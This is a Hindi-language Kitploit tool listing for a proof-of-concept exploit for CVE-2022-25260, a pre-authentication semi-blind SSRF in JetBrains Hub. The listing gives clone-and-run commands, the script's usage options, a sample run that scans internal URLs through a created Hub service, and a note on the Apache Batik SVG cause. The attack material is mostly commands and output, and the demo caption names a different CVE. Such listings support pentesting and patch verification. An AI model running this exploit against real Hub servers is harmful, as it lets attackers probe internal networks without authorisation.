Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-25260 — CVE-2022-25260 के लिए PoC: JetBrains Hub में प्री-ऑथ अर्ध-ब्लाइंड SSRF | Kitploit
उपकरण/GitHubGitHub/yuriisanin/cve-2022-25260
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubyuriisanin/cve-2022-25260

CVE-2022-25260

CVE-2022-25260 के लिए PoC: JetBrains Hub में प्री-ऑथ अर्ध-ब्लाइंड SSRF

रिपॉजिटरी देखें
4344 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-25260

JetBrains Hub प्री-ऑथ अर्ध-अंधा सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF)

आवश्यकताएँ

  • JetBrains Hub <2021.1.14276
  • JetBrains Hub 2021.1.14276 से पहले का संस्करण अनुचित एक्सेस नियंत्रण (CVE-2022-34894) के प्रति संवेदनशील था, जो एक हमलावर को बिना प्रमाणीकरण के अविश्वसनीय सेवाएँ बनाने की अनुमति देता है, भले ही अतिथि उपयोगकर्ता अक्षम हो। यह किसी भी अन्य आवश्यकता के बिना भेद्यता का शोषण करना संभव बनाता है (सामान्यतः हमलावर को कम से कम प्रमाणित होना चाहिए)।

उपयोग

इंस्टॉल करें और चलाएँ:

$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

उपयोग:

$ python3 exploit.py hub_url http://localhost:8080 -email [email protected] -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

डेमो:

CVE-2022-24342 Demo

यह कैसे काम करता है?

यह भेद्यता उपयोगकर्ता द्वारा प्रदत्त SVG आइकन रैस्टराइज़ेशन के लिए Apache Batik को डिफ़ॉल्ट सेटिंग्स के साथ उपयोग करने के कारण संभव थी। सर्वर-साइड SVG रैस्टराइज़ेशन के शोषण के बारे में अधिक जानकारी आप यहाँ पा सकते हैं।

सहायता

आप मुझे Twitter, GitHub या YouTube पर फॉलो कर सकते हैं।

टूल डाउनलोड करें